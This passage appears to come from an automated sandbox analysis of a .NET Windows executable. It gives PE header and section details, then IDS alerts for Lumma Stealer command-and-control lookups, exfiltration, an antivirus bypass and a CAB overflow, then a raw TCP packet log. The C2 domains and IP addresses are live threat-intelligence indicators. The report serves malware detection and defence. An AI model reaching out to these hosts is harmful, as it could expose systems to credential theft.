                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x610.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xc2fc0x1c.text
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000xa3700xa4003a0f4275f7ed8a4a02795d06bfe395dfFalse0.24054401676829268data3.9111563002235537IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0xe0000x6100x80092aaf4a55736a28d9c609716b869d82dFalse0.31884765625data3.4591587823885317IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x100000xc0x2004bb8e39b7134c57236ea10a8dfe65823False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_VERSION0xe0900x380data0.39285714285714285
                                                                                        RT_MANIFEST0xe4200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-11-14T08:08:18.652472+01002800029ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass1147.45.44.13180192.168.2.549704TCP
                                                                                        2024-11-14T08:08:20.850724+01002057410ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (netwrokenb .cyou)1192.168.2.5639251.1.1.153UDP
                                                                                        2024-11-14T08:08:21.526630+01002057411ET MALWARE Observed Win32/Lumma Stealer Related Domain (netwrokenb .cyou in TLS SNI)1192.168.2.549705188.114.96.3443TCP
                                                                                        2024-11-14T08:08:21.526630+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705188.114.96.3443TCP
                                                                                        2024-11-14T08:08:22.073793+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705188.114.96.3443TCP
                                                                                        2024-11-14T08:08:22.073793+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.96.3443TCP
                                                                                        2024-11-14T08:08:22.079251+01002057346ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (repostebhu .sbs)1192.168.2.5510471.1.1.153UDP
                                                                                        2024-11-14T08:08:22.103876+01002057354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thinkyyokej .sbs)1192.168.2.5625961.1.1.153UDP
                                                                                        2024-11-14T08:08:22.150149+01002057338ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ducksringjk .sbs)1192.168.2.5530351.1.1.153UDP
                                                                                        2024-11-14T08:08:22.173799+01002057340ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explainvees .sbs)1192.168.2.5554321.1.1.153UDP
                                                                                        2024-11-14T08:08:22.197367+01002057334ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brownieyuz .sbs)1192.168.2.5493001.1.1.153UDP
                                                                                        2024-11-14T08:08:22.224280+01002057348ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rottieud .sbs)1192.168.2.5558981.1.1.153UDP
                                                                                        2024-11-14T08:08:22.258707+01002057344ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (relalingj .sbs)1192.168.2.5528931.1.1.153UDP
                                                                                        2024-11-14T08:08:22.309758+01002057350ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tamedgeesy .sbs)1192.168.2.5513581.1.1.153UDP
                                                                                        2024-11-14T08:08:23.248794+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.102.49.254443TCP
                                                                                        2024-11-14T08:08:23.854551+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549706104.102.49.254443TCP
                                                                                        2024-11-14T08:08:23.976547+01002057415ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com)1192.168.2.5494661.1.1.153UDP
                                                                                        2024-11-14T08:08:24.766719+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.549707188.114.96.3443TCP
                                                                                        2024-11-14T08:08:24.766719+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707188.114.96.3443TCP
                                                                                        2024-11-14T08:08:25.512984+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549707188.114.96.3443TCP
                                                                                        2024-11-14T08:08:25.512984+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549707188.114.96.3443TCP
                                                                                        2024-11-14T08:08:26.182744+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.549708188.114.96.3443TCP
                                                                                        2024-11-14T08:08:26.182744+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708188.114.96.3443TCP
                                                                                        2024-11-14T08:08:26.697121+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549708188.114.96.3443TCP
                                                                                        2024-11-14T08:08:26.697121+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549708188.114.96.3443TCP
                                                                                        2024-11-14T08:08:27.485559+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.549709188.114.96.3443TCP
                                                                                        2024-11-14T08:08:27.485559+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709188.114.96.3443TCP
                                                                                        2024-11-14T08:08:28.661337+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.549710188.114.96.3443TCP
                                                                                        2024-11-14T08:08:28.661337+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710188.114.96.3443TCP
                                                                                        2024-11-14T08:08:29.329609+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549710188.114.96.3443TCP
                                                                                        2024-11-14T08:08:30.074954+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.549711188.114.96.3443TCP
                                                                                        2024-11-14T08:08:30.074954+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711188.114.96.3443TCP
                                                                                        2024-11-14T08:08:31.420994+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.549712188.114.96.3443TCP
                                                                                        2024-11-14T08:08:31.420994+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712188.114.96.3443TCP
                                                                                        2024-11-14T08:08:32.961765+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.549713188.114.96.3443TCP
                                                                                        2024-11-14T08:08:32.961765+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713188.114.96.3443TCP
                                                                                        2024-11-14T08:08:36.008106+01002057416ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)1192.168.2.549715188.114.96.3443TCP
                                                                                        2024-11-14T08:08:36.008106+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715188.114.96.3443TCP
                                                                                        2024-11-14T08:08:36.490906+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549715188.114.96.3443TCP
                                                                                        2024-11-14T08:08:37.356363+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549714TCP
                                                                                        2024-11-14T08:09:16.237232+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549912TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 14, 2024 08:08:17.686361074 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:17.691450119 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:17.691767931 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:17.691899061 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:17.696815968 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.529835939 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.529863119 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.529874086 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.529891014 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.529896975 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.529912949 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.529972076 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.530081987 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.530200958 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.530220985 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.530236959 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.530287027 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.530478001 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.530524969 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.535059929 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.535115957 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.535145998 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.535172939 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.580349922 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.651772976 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.651865005 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.651921988 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.651937962 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.651968002 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.652004004 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.652004957 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.652115107 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.652149916 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.652189016 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.652399063 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.652432919 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.652437925 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.652472019 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.652520895 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.653006077 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.653042078 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.653078079 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.653088093 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.705344915 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.768527985 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.768654108 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.768663883 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.768735886 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.768748045 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.768762112 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.768790960 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.768937111 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.768949032 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.768970013 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.769458055 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.769504070 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.769530058 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.769541025 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.769578934 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.769843102 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.769854069 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.769897938 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.773344040 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.773372889 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.773425102 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.773494959 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.773583889 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.773627996 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.885489941 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.885535002 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.885546923 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.885596037 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.885694027 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.885706902 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.885739088 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.885909081 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.885951042 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.885991096 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.886002064 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.886068106 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.886212111 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.886286020 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.886296988 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.886322021 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.890328884 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.890372038 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.890384912 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.890389919 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.890433073 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:18.890544891 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:18.939703941 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.002540112 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.002559900 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.002573967 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.002593040 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.002639055 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.002640009 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.002651930 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.002710104 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.002882004 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.002896070 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.002948046 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.003601074 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.003715038 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.003726006 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.003761053 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.007138014 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.007211924 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.007220984 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.007272005 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.007318020 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.007371902 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.007383108 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.007494926 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.007574081 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.049067974 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.119230986 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.119277000 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.119287968 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.119301081 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.119395018 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.119524002 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.119610071 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.119622946 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.119735003 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.119818926 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.119829893 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.119858027 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.120429039 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.120474100 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.124084949 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.124178886 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.124190092 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.124218941 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.124236107 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.124248981 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.124259949 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.124284029 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.124308109 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.124805927 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.125215054 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.125269890 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.236382961 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.236416101 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.236428976 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.236521959 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.236578941 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.236613035 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.236659050 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.236665964 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.236711025 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.237317085 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.237409115 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.237415075 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.237459898 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.237593889 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.237658978 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.237682104 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.237739086 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.237785101 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.241281986 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.241307020 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.241314888 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.241388083 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.241543055 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.241555929 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.241610050 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.293385029 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.293828964 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.293934107 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.353476048 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.353507042 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.353518009 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.353598118 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.353702068 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.353708982 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.353758097 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.353923082 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.353980064 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.354022980 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.354027987 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.354068041 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.357862949 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.357928038 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.357939005 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.357995033 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.358131886 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.358139038 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.358186960 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.358283997 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.358374119 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.358419895 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.358454943 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.358494997 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.358549118 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.449304104 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.449316978 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.449548960 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.470647097 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.470659971 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.470674992 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.470733881 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.470741987 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.470793962 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.470794916 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.470896006 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.471024036 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.471029043 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.471045971 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.471086979 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.471193075 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.471244097 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.471287012 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.474704027 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.474771023 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.474781990 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.474845886 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.474982023 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.475064039 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.475075006 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.475106955 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.475234032 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.475240946 CET8049704147.45.44.131192.168.2.5
                                                                                        Nov 14, 2024 08:08:19.475281954 CET4970480192.168.2.5147.45.44.131
                                                                                        Nov 14, 2024 08:08:19.587332010 CET8049704147.45.44.131192.168.2.5
